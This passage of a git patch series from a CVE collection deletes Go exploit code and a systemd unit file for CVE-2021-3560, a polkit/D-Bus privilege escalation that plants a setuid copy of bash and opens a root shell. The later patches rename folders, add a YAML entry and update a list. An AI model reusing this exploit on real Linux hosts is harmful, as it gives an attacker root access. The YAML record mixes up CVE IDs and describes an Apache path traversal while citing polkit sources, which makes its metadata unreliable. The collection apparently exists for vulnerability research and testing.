- Env: os.Environ(), - Files: []uintptr{os.Stdin.Fd(), os.Stdout.Fd(), os.Stderr.Fd()}, - } - args := append(os.Args, "1") - go syscall.ForkExec("/proc/self/exe", args, attr) -} - -func main() { - if len(os.Args) == 2 { - Banner() - } - if !strings.HasSuffix(os.Args[1], ".service") { - Logging("[-] Unit file must end with .service") - os.Exit(3) - } - - abs, err := filepath.Abs(os.Args[1]) - if err != nil { - Logging("[-] Unit file status error: %s", err) - os.Exit(3) - } - - if len(os.Args) <= 4 { - Fork() - } - - var agent Agent - - if len(os.Args) != 2 { - go agent.StartAgent() - time.Sleep(time.Millisecond * 500) - } - - if len(os.Args) == 3 { - go MethodCallStartService(filepath.Base(abs)) - } else if len(os.Args) == 4 { - go MethodCallEnableUnitFiles(abs) - } else if len(os.Args) == 5 { - go MethodReload() - } else { - for i:=1; i<5; i++ { - time.Sleep(time.Second) - if _, err := os.Stat("/usr/local/bin/pwned"); err == nil { - Logging("[+] File exists, popping root shell ...") - cmd := exec.Command("/usr/local/bin/pwned", "-p") - cmd.Stdin = os.Stdin - cmd.Stdout = os.Stdout - cmd.Stderr = os.Stderr - cmd.Run() - os.Exit(0) - } - } - Logging("[-] Exploit failed, please try again") - os.Exit(1) - } - - select {} -} - - -func MethodCallStartService(ServiceName string) { - Logging("[*] Starting systemd service '%s' ...", ServiceName) - conn, err := dbus.ConnectSystemBus() - defer conn.Close() - if err != nil { - Logging("[-] Error for connecting system bus: %s", err) - os.Exit(1) - } - - bus := conn.Object(SystemdName, dbus.ObjectPath(SystemdObjectPath)) - call := bus.Call(SystemdInterface+".StartUnit", 4, ServiceName, "replace") - if call.Err != nil { - Logging("[-] Error for starting systemd service: %s", call.Err) - } -} - -func MethodReload() { - Logging("[*] Reloading systemd daemon ...") - conn, err := dbus.ConnectSystemBus() - if err != nil { - Logging("[-] Error for connecting system bus: %s", err) - os.Exit(1) - } - - bus := conn.Object(SystemdName, dbus.ObjectPath(SystemdObjectPath)) - message := CreateMessage(bus, SystemdInterface+".Reload") - call := conn.Send(message, make(chan *dbus.Call, 1)) - if call.Err != nil { - Logging("[-] Error for reloading daemon: %s", call.Err) - } -} - -func MethodCallEnableUnitFiles(ServiceName string) { - Logging("[*] Enabling systemd unit file '%s' ...", ServiceName) - conn, err := dbus.ConnectSystemBus() - if err != nil { - Logging("[-] Error for connection system bus: %s", err) - os.Exit(1) - } - - bus := conn.Object(SystemdName, dbus.ObjectPath(SystemdObjectPath)) - message := CreateMessage(bus, SystemdInterface+".EnableUnitFiles", []string{ServiceName}, false, true) - call := conn.Send(message, make(chan *dbus.Call, 1)) - if call.Err != nil { - Logging("[-] Error for enabling unit file: %s", call.Err) - } -} - -func CreateMessage(obj dbus.BusObject, method string, args ...interface{}) *dbus.Message { - iface := "" - i := strings.LastIndex(method, ".") - if i != -1 { - iface = method[:i] - } - method = method[i+1:] - msg := new(dbus.Message) - msg.Type = dbus.TypeMethodCall - msg.Flags = dbus.FlagAllowInteractiveAuthorization - msg.Headers = make(map[dbus.HeaderField]dbus.Variant) - msg.Headers[dbus.FieldPath] = dbus.MakeVariant(obj.Path()) - msg.Headers[dbus.FieldDestination] = dbus.MakeVariant(obj.Destination()) - msg.Headers[dbus.FieldMember] = dbus.MakeVariant(method) - if iface != "" { - msg.Headers[dbus.FieldInterface] = dbus.MakeVariant(iface) - } - msg.Body = args - if len(args) > 0 { - msg.Headers[dbus.FieldSignature] = dbus.MakeVariant(dbus.SignatureOf(args...)) - } - return msg -} diff --git a/cve/apache/2021/CVE-2021-3560/CVE-2021-35601/go.mod b/cve/apache/2021/CVE-2021-3560/CVE-2021-35601/go.mod deleted file mode 100644 index 9e06b1f1..00000000 --- a/cve/apache/2021/CVE-2021-3560/CVE-2021-35601/go.mod +++ /dev/null @@ -1,5 +0,0 @@ -module CVE-2021-3560 - -go 1.13 - -require github.com/godbus/dbus/v5 v5.1.0 diff --git a/cve/apache/2021/CVE-2021-3560/CVE-2021-35601/go.sum b/cve/apache/2021/CVE-2021-3560/CVE-2021-35601/go.sum deleted file mode 100644 index 7538a956..00000000 --- a/cve/apache/2021/CVE-2021-3560/CVE-2021-35601/go.sum +++ /dev/null @@ -1,3 +0,0 @@ -github.com/godbus/dbus v4.1.0+incompatible h1:WqqLRTsQic3apZUK9qC5sGNfXthmPXzUZ7nQPrNITa4= -github.com/godbus/dbus/v5 v5.1.0 h1:4KLkAxT3aOY8Li4FRJe/KvhoNFFxo0m6fNuFUO8QJUk= -github.com/godbus/dbus/v5 v5.1.0/go.mod h1:xhWf0FNVPg57R7Z0UbKHbJfkEywrmjJnf7w5xrFpKfA= diff --git a/cve/apache/2021/CVE-2021-3560/CVE-2021-35601/pwnkit.service b/cve/apache/2021/CVE-2021-3560/CVE-2021-35601/pwnkit.service deleted file mode 100644 index 76435650..00000000 --- a/cve/apache/2021/CVE-2021-3560/CVE-2021-35601/pwnkit.service +++ /dev/null @@ -1,9 +0,0 @@ -[Unit] -Description=Super Secure Shell -AllowIsolate=no - -[Service] -ExecStart=/bin/bash -c '/usr/bin/cp /bin/bash /usr/local/bin/pwned; /usr/bin/chmod +s /usr/local/bin/pwned' - -[Install] -Alias=pwnkit.service -- Gitee From 3e78e1a308f064e3e14d7401d57ff6837060fce4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 20 Mar 2023 13:30:56 +0000 Subject: [PATCH 7/9] =?UTF-8?q?=E9=87=8D=E5=91=BD=E5=90=8D=20cve/apache/20?= =?UTF-8?q?21/CVE-2021-3560-Authentication-Agent-main=20=E4=B8=BA=20cve/ap?= =?UTF-8?q?ache/2021/CVE-2021-3560?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../LICENSE | 0 .../README.md | 0 .../agent.go | 0 .../exploit.go | 0 .../go.mod | 0 .../go.sum | 0 .../pwnkit.service | 0 7 files changed, 0 insertions(+), 0 deletions(-) rename cve/apache/2021/{CVE-2021-3560-Authentication-Agent-main => CVE-2021-3560}/LICENSE (100%) rename cve/apache/2021/{CVE-2021-3560-Authentication-Agent-main => CVE-2021-3560}/README.md (100%) rename cve/apache/2021/{CVE-2021-3560-Authentication-Agent-main => CVE-2021-3560}/agent.go (100%) rename cve/apache/2021/{CVE-2021-3560-Authentication-Agent-main => CVE-2021-3560}/exploit.go (100%) rename cve/apache/2021/{CVE-2021-3560-Authentication-Agent-main => CVE-2021-3560}/go.mod (100%) rename cve/apache/2021/{CVE-2021-3560-Authentication-Agent-main => CVE-2021-3560}/go.sum (100%) rename cve/apache/2021/{CVE-2021-3560-Authentication-Agent-main => CVE-2021-3560}/pwnkit.service (100%) diff --git a/cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/LICENSE b/cve/apache/2021/CVE-2021-3560/LICENSE similarity index 100% rename from cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/LICENSE rename to cve/apache/2021/CVE-2021-3560/LICENSE diff --git a/cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/README.md b/cve/apache/2021/CVE-2021-3560/README.md similarity index 100% rename from cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/README.md rename to cve/apache/2021/CVE-2021-3560/README.md diff --git a/cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/agent.go b/cve/apache/2021/CVE-2021-3560/agent.go similarity index 100% rename from cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/agent.go rename to cve/apache/2021/CVE-2021-3560/agent.go diff --git a/cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/exploit.go b/cve/apache/2021/CVE-2021-3560/exploit.go similarity index 100% rename from cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/exploit.go rename to cve/apache/2021/CVE-2021-3560/exploit.go diff --git a/cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/go.mod b/cve/apache/2021/CVE-2021-3560/go.mod similarity index 100% rename from cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/go.mod rename to cve/apache/2021/CVE-2021-3560/go.mod diff --git a/cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/go.sum b/cve/apache/2021/CVE-2021-3560/go.sum similarity index 100% rename from cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/go.sum rename to cve/apache/2021/CVE-2021-3560/go.sum diff --git a/cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/pwnkit.service b/cve/apache/2021/CVE-2021-3560/pwnkit.service similarity index 100% rename from cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/pwnkit.service rename to cve/apache/2021/CVE-2021-3560/pwnkit.service -- Gitee From 136c40e283cced44a16010002c02fa94bd0cd24b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 20 Mar 2023 13:35:43 +0000 Subject: [PATCH 8/9] add cve/apache/2021/yaml/CVE-2022-3560.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王烁林 <17377137@buaa.edu.cn> --- cve/apache/2021/yaml/CVE-2022-3560.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 cve/apache/2021/yaml/CVE-2022-3560.yaml diff --git a/cve/apache/2021/yaml/CVE-2022-3560.yaml b/cve/apache/2021/yaml/CVE-2022-3560.yaml new file mode 100644 index 00000000..5c442dae --- /dev/null +++ b/cve/apache/2021/yaml/CVE-2022-3560.yaml @@ -0,0 +1,20 @@ +id: CVE-2021-42013 +source: https://github.com/RicterZ/CVE-2021-3560-Authentication-Agent +info: + name: Apache HTTP Server(简称 Apache)是开源的 Web 服务器,可以在大多数计算机操作系统中运行,由于其多平台和安全性被广泛使用,是最流行的 Web 服务器端软件之一。它快速、可靠并且可通过简单的 API 扩展,将 Perl/Python 等解释器编译到服务器中。 + severity: critical + description: | + Apache HTTP Server 2.4.50版本中对CVE-2021-41773修复不够完善,攻击者可利用该漏洞绕过修复补丁,并利用目录穿越攻击访问服务器中一些文件,进而造成敏感信息泄露。若httpd中开启CGI功能,攻击者可以构造恶意请求,造成远程代码执行。 + scope-of-influence: + Apache HTTP = 2.4.49, Apache HTTP = 2.4.50 + reference: + - https://ricterz.me/posts/2022-04-28-a-new-exploit-method-for-cve-2021-3560-polkit-linux-privilege-escalation.txt + - http://noahblog.360.cn/a-new-exploit-method-for-cve-2021-3560-policykit-linux-privilege-escalation + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-3560 + cwe-id: CWE-22 + cnvd-id: None + kve-id: None + tags: cve2021,Apache,目录遍历,RCE \ No newline at end of file -- Gitee From 26c42460067edbd403b77d0eb80847597184767d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 20 Mar 2023 13:36:57 +0000 Subject: [PATCH 9/9] update openkylin_list.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王烁林 <17377137@buaa.edu.cn> --- openkylin_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 723a6199..41076103 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -4,6 +4,7 @@ cve: - CVE-2020-9490 - CVE-2021-41773 - CVE-2021-42013 + - CVE-2021-3560 apache-APISIX: - CVE-2022-24112 apache-activemq: -- Gitee